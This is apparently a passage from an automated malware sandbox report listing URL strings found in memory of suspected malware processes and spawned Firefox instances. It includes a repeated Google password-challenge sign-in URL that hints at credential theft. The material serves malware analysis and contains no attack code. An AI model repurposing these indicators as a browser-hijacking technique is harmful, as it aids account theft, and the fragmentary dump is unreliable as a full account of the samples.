Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001A.00000003.3079779963.0000025935546000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.3072690944.000002593B8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001A.00000003.3137894022.00000259371E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001A.00000003.3061871345.000002593B92B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/http://www.mozilla.org/keymaster/gatekeeper/there
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F0AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B85F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3066988421.000002593BB53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995425549.0000025933800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchdf070348-e771-4bd5-964e-d19d82c1384e
Source: file.exe, 00000000.00000003.2114591297.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114812044.0000000006168000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114537427.000000000616B000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820622416.0000000005C86000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2821001734.0000000005C83000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938700152.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2939218924.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3051345571.0000000005E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/media.gmp-manager.cert.requireBuiltInresource://gre/modules/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995881145.0000025933A38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2996104229.0000025933A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/AND
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001A.00000002.3186609548.000002592FA08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001A.00000003.3111017875.000002593BFDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3106778667.000002593BFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3111017875.000002593BFF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2142992607.0000000006441000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2849411017.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2979383232.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2142992607.0000000006441000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2849411017.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2979383232.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 0000001C.00000002.3161526093.0000021CD9AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D455C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/D
Source: file.exe, 00000000.00000003.2142992607.0000000006441000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2849411017.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2979383232.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3129189407.0000000005F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgX
Source: firefox.exe, 0000001A.00000002.3158728594.000000DF8B9BC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3183561232.000002592F1DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/onPrefEMEGlobalEnabledChangedstartup
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D45503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B8CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3186609548.000002592FA08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000003.3153782991.000002593D8DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001E.00000002.3162203644.0000023D456F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.co
Source: firefox.exe, 0000001A.00000003.3079779963.0000025935521000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3175722830.0000025923749000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3175549920.0000025923710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3158390623.0000021CD9670000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160667016.0000021CD9894000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3158390623.0000021CD967A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158239384.0000023D453C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158239384.0000023D453CA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162203644.0000023D456F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2974638690.0000018DF4BFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2983879138.000001BC56397000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3175722830.0000025923749000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: 1dc3787ee3.exe, 0000000C.00000002.3005498999.00000000018C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdL32.dllol
Source: firefox.exe, 0000001A.00000002.3178430475.000002592557C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3178430475.0000025925549000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3158390623.0000021CD9670000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160667016.0000021CD9894000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158239384.0000023D453C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162203644.0000023D456F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdTake
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdq
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50277 -> 443
